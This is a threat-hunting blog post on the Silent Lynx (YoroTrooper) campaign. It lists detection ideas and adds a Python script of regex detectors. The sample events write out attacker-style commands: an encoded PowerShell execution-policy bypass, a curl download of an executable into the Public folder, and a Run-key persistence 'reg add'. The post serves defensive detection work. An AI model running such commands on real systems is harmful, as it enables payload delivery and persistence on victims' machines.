025. Silent Lynx Campaign: Detection Opportunities
Hello everyone! Today we're going to talk about an activity cluster which researchers from Seqrite named Silent Lynx. It's also known as YoroTrooper and SturgeonPhisher, and according to Cisco Talos it originates from Kazakhstan. The BI.ZONE Threat Intelligence team tracks this cluster under the name Cavalry Werewolf.
Seqrite researchers uncovered two campaigns:
- RAR archives with malicious ISO files. These files contained decoy documents and C++ loaders.
- RAR archives with decoy documents and a Golang reverse shell.
As always, let's look at detection and hunting opportunities. First, the ISO files used in this campaign are very small, which is unusual for ISO images:
- Look for small ISO files with executable contents
- Look for small ISO files in Downloads, Documents and Desktop folders
Next, the loader used PowerShell to communicate with the Telegram API, receive and run commands, and send back the output or errors:
- Look for PowerShell execution with -NoProfile -ExecutionPolicy Bypass -e and long Base64 encoded strings as arguments
- Look for PowerShell communications with api[.]telegram[.]org
The adversary leveraged curl.exe to download additional payloads to the compromised system:
- Look for cmd /c curl -o execution for downloading executables to %PUBLIC% folder
The threat actors also modified the registry to achieve persistence:
- Look for reg add or reg query executions related to HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key
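As an added illustration (not from the original post), here is a small Python hunt that applies the process-creation and ISO checks above to constructed sample events; the regexes, the 5 MB ISO threshold and the sample command lines are assumptions to tune for your own telemetry.

```python
import re
from typing import List

# Constructed sample process-creation command lines (not from the original post).
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -e " + "SQBFAFgA" * 20,
    r"cmd /c curl -o C:\Users\Public\update.exe http://example.invalid/update.exe",
    r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\Public\update.exe",
    "powershell.exe -NoProfile -Command Get-Process",  # benign admin use, must not fire
]

# PowerShell with -NoProfile and -ExecutionPolicy Bypass plus a long Base64 blob after -e/-ec/-EncodedCommand.
RE_PS_ENCODED = re.compile(
    r"-NoProfile\b.*-ExecutionPolicy\s+Bypass\b.*\s-e(?:c|ncodedcommand)?\s+[A-Za-z0-9+/=]{100,}",
    re.IGNORECASE)
# curl writing its output file into the Public profile (%PUBLIC% or the expanded path).
RE_CURL_PUBLIC = re.compile(
    r"\bcurl(?:\.exe)?\b.*\s-o\s+\"?(?:%PUBLIC%|C:\\Users\\Public)\\", re.IGNORECASE)
# reg add / reg query touching the per-user Run key.
RE_REG_RUN = re.compile(
    r"\breg(?:\.exe)?\s+(?:add|query)\s+.*HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b",
    re.IGNORECASE)

ISO_SIZE_LIMIT = 5 * 1024 * 1024  # assumed threshold (5 MB); tune to what is normal in your estate
USER_DIRS = ("\\downloads\\", "\\documents\\", "\\desktop\\")


def classify(cmdline: str) -> List[str]:
    """Return the names of the behaviours from the post that one command line matches."""
    hits = []
    if RE_PS_ENCODED.search(cmdline):
        hits.append("powershell_encoded_bypass")
    if RE_CURL_PUBLIC.search(cmdline):
        hits.append("curl_download_to_public")
    if RE_REG_RUN.search(cmdline):
        hits.append("reg_run_key_persistence")
    return hits


def suspicious_iso(path: str, size_bytes: int) -> bool:
    """Flag a small .iso written under a user's Downloads, Documents or Desktop folder."""
    p = path.lower()
    return p.endswith(".iso") and size_bytes <= ISO_SIZE_LIMIT and any(d in p for d in USER_DIRS)


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        if hits := classify(cmd):
            print(hits, cmd[:70])
```

Feed real Sysmon Event ID 1 / 4688 command lines and file-creation events into `classify()` and `suspicious_iso()` respectively; the benign `-NoProfile -Command` line shows why the rule requires the full flag combination rather than `-NoProfile` alone.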
See you tomorrow!